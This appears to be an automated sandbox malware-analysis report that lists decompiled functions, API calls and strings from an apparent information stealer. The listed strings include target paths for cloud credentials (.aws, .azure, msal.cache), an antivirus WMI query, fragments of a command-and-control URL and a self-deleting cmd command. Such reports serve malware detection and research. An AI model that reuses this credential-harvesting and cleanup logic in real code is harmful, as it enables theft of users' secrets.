String ID: "$"$------$------$------$.iC+iC*iC)iC$build_id$hwid
API String ID: 3006978581-1606956078
Opcode ID: 4d45ddf0b01d2a06334fb0e33615e4d8f984d4a921190004fabfd644f2314dcc
Instruction ID: 3040147f5f4678fe992309810e248b9803610b6cae96e355d4799f26b47fefd8
Opcode Fuzzy Hash: 4d45ddf0b01d2a06334fb0e33615e4d8f984d4a921190004fabfd644f2314dcc
Instruction Fuzzy Hash: CB029071D5512A9ACF20EB22CD46ADDB7B5FF04308F4140E6A54873195CAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 1d72ff161fed057ab68b28080e2d50ba8940a56841d6e9954f1ae892bc736100
Instruction ID: 80347af438f88fdc2ba7574c4bb0bd65363f03f560bd8c6cc43ee37f9d0328b7
Opcode Fuzzy Hash: 1d72ff161fed057ab68b28080e2d50ba8940a56841d6e9954f1ae892bc736100
Instruction Fuzzy Hash: 6841C6B1900218ABDB205F61AC4CF9F7B7DEB85715F1016BAF00AE20A1DA354E54CF38

Function 00416287 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004162AC

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004162CB
lstrcatA.KERNEL32(?,\.azure\), ref: 004162E8

Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415DE2
Part of subcall function 00415D9B: FindFirstFileA.KERNEL32(?,?), ref: 00415DF9
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00415E1A
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,00436AB8), ref: 00415E34
Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415E5B
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,0043661D), ref: 00415E6F
Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415E8C
Part of subcall function 00415D9B: PathMatchSpecA.SHLWAPI(?,?), ref: 00415EB9
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?), ref: 00415EEF
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,00436AD0), ref: 00415F01
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,?), ref: 00415F14
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,00436AD4), ref: 00415F26
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,?), ref: 00415F3A

_memset.LIBCMT ref: 00416320
lstrcatA.KERNEL32(?,00000000), ref: 00416342
lstrcatA.KERNEL32(?,\.aws\), ref: 0041635F

Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415EA3
Part of subcall function 00415D9B: FindNextFileA.KERNEL32(?,?), ref: 004160C9
Part of subcall function 00415D9B: FindClose.KERNEL32(?), ref: 004160DD

_memset.LIBCMT ref: 00416394
lstrcatA.KERNEL32(?,00000000), ref: 004163B6
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 004163D3
_memset.LIBCMT ref: 00416408

Strings

\.aws\, xrefs: 00416353
Azure\.azure, xrefs: 004162FB
*.*, xrefs: 00416300
msal.cache, xrefs: 004163E8
*.*, xrefs: 00416374
Azure\.aws, xrefs: 0041636F
Azure\.IdentityService, xrefs: 004163E3
\.azure\, xrefs: 004162DC
\.IdentityService\, xrefs: 004163C7

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: d511006fe3e0fefc7bee74944a8cc93eb3b1e81339f7fb8e15dc6a17e5d5c3ea
Instruction ID: 0bdda17f077a07877436a4099f7604037162b7fb3fe9dac79b98ac75ca5a795c
Opcode Fuzzy Hash: d511006fe3e0fefc7bee74944a8cc93eb3b1e81339f7fb8e15dc6a17e5d5c3ea
Instruction Fuzzy Hash: EB41C371E4021CBADB14EB60EC47FED777CAB09704F5444AAB605F3091DAB8AA848F58

Function 00416F55 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1023networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041848C), ref: 00416FF1
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00417000
CreateDirectoryA.KERNEL32(?,00000000,004366B7), ref: 0041751E
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004175DF
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004175F8

Part of subcall function 00404B2E: InternetOpenA.WININET(.iC+iC*iC)iC,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417658), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417997

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041848C), ref: 00417014

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417D2E,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00417EFD

Strings

_DEBUG.zip, xrefs: 00417E32
org, xrefs: 00417DE4
0076b6a02eb028dde461f6494f955b49, xrefs: 00417620
http://, xrefs: 00417D54
hopto, xrefs: 00417D9C
cowod., xrefs: 00417D78
.exe, xrefs: 00417D01
.exe, xrefs: 0041745D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$0076b6a02eb028dde461f6494f955b49$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1841774194
Opcode ID: cc71a0db668fabe39b89fd9cbb577dcb38a019df4b3da8bffacc8a5e8bd17cd3
Instruction ID: 37becc6f2778139c4cc8875cc59fbce9c46761e453eb24f8be1c09d9f4fb9cf2
Opcode Fuzzy Hash: cc71a0db668fabe39b89fd9cbb577dcb38a019df4b3da8bffacc8a5e8bd17cd3
Instruction Fuzzy Hash: 7D923F715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AE8D8B9A

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

true, xrefs: 004136A6
false, xrefs: 004136C5

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: 98bb7590db1188d60a33bd1924cfe79eac0422913e93217bd14ae18bee68dae0
Instruction ID: d5248618e850dc1b608ba14aa50abb6eb4d06e0ea1cf5847f89628b9c6e6e9c0
Opcode Fuzzy Hash: 98bb7590db1188d60a33bd1924cfe79eac0422913e93217bd14ae18bee68dae0
Instruction Fuzzy Hash: F4B13CB5901218AFCB61EF55DC89ACA77B5BB18305F0001EAE549A7261EF74AFC4CF48

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Strings

ERROR, xrefs: 00406BAB
ERROR, xrefs: 00406AB6
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 091c933b32924519dda16ada7f046d38be0fd42441f7afdff0c19439478f3611
Instruction ID: b88f1ea2ba5dc6b4f3251940a64d96726d6ac11886d8f9fd685b88125a31ac18
Opcode Fuzzy Hash: 091c933b32924519dda16ada7f046d38be0fd42441f7afdff0c19439478f3611
Instruction Fuzzy Hash: 5D51A1B1900229AFDB21AB60DC85BEEB7B9FB04704F0181F6F549B2190CE745EC59F94

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Select * From AntiVirusProduct, xrefs: 00411A23
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AB4
WQL, xrefs: 00411A28
Unknown, xrefs: 00411AA0
displayName, xrefs: 00411A6F
Unknown, xrefs: 00411A99

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 7e980ca89398af0f1ce1c8cb39bdcbab8c82f4202136ed360c28708da12a6ac1
Instruction ID: fe4dc733033ef1fdc8e2fcb56474afa563e3b925598b92205438a9154c5b599f
Opcode Fuzzy Hash: 7e980ca89398af0f1ce1c8cb39bdcbab8c82f4202136ed360c28708da12a6ac1
Instruction Fuzzy Hash: FB314170A04245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043AA94), ref: 004012D0
lstrcatA.KERNEL32(?,0043AA98), ref: 004012DE
lstrcatA.KERNEL32(?,0043AA9C), ref: 004012EC
lstrcatA.KERNEL32(?,0043AAA0), ref: 004012FA
lstrcatA.KERNEL32(?,0043AAA4), ref: 00401308
lstrcatA.KERNEL32(?,0043AAA8), ref: 00401316
lstrcatA.KERNEL32(?,0043AAAC), ref: 00401324
lstrcatA.KERNEL32(?,0043AAB0), ref: 00401332
lstrcatA.KERNEL32(?,0043AAB4), ref: 00401340
lstrcatA.KERNEL32(?,0043AAB8), ref: 0040134E
lstrcatA.KERNEL32(?,0043AABC), ref: 0040135C
lstrcatA.KERNEL32(?,0043AAC0), ref: 0040136A
lstrcatA.KERNEL32(?,0043AAC4), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 91136c7fde9a1e3df621a5fce1b511d37bfe3ee0d2fb27449d5f158e235ec971
Instruction ID: 247b78bf03537ba2fe0e3ef6c3db8ac13996790cfd70b18385c12f6e10060947
Opcode Fuzzy Hash: 91136c7fde9a1e3df621a5fce1b511d37bfe3ee0d2fb27449d5f158e235ec971
Instruction Fuzzy Hash: 96418772D4422C56DB20EBB19C59FDB7FAC9F18350F5405A3E8D8E3181D67C9A84CB58

Function 0041816E Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418193
_memset.LIBCMT ref: 004181A2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004181B7

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418353
_memset.LIBCMT ref: 00418362
_memset.LIBCMT ref: 00418374
ExitProcess.KERNEL32 ref: 00418384

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & exit, xrefs: 004182D7
" & exit, xrefs: 00418286
/c timeout /t 10 & del /f /q ", xrefs: 004181E2
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 0041828D
" & rd /s /q "C:\ProgramData\, xrefs: 00418230

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 57ffedab574903643616b03e8675b8b9dd446d1d70cfb9617be16edba6fa82a8
Instruction ID: 7da789157b42ce8c1e7b476e203a4ba336266c099bd027603f00904a141872ae
Opcode Fuzzy Hash: 57ffedab574903643616b03e8675b8b9dd446d1d70cfb9617be16edba6fa82a8
Instruction Fuzzy Hash: 0C51BEB1E402299BCB61EF55CD81ADDB7BCAB44708F4100EAA718B3152DB746FC68F58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

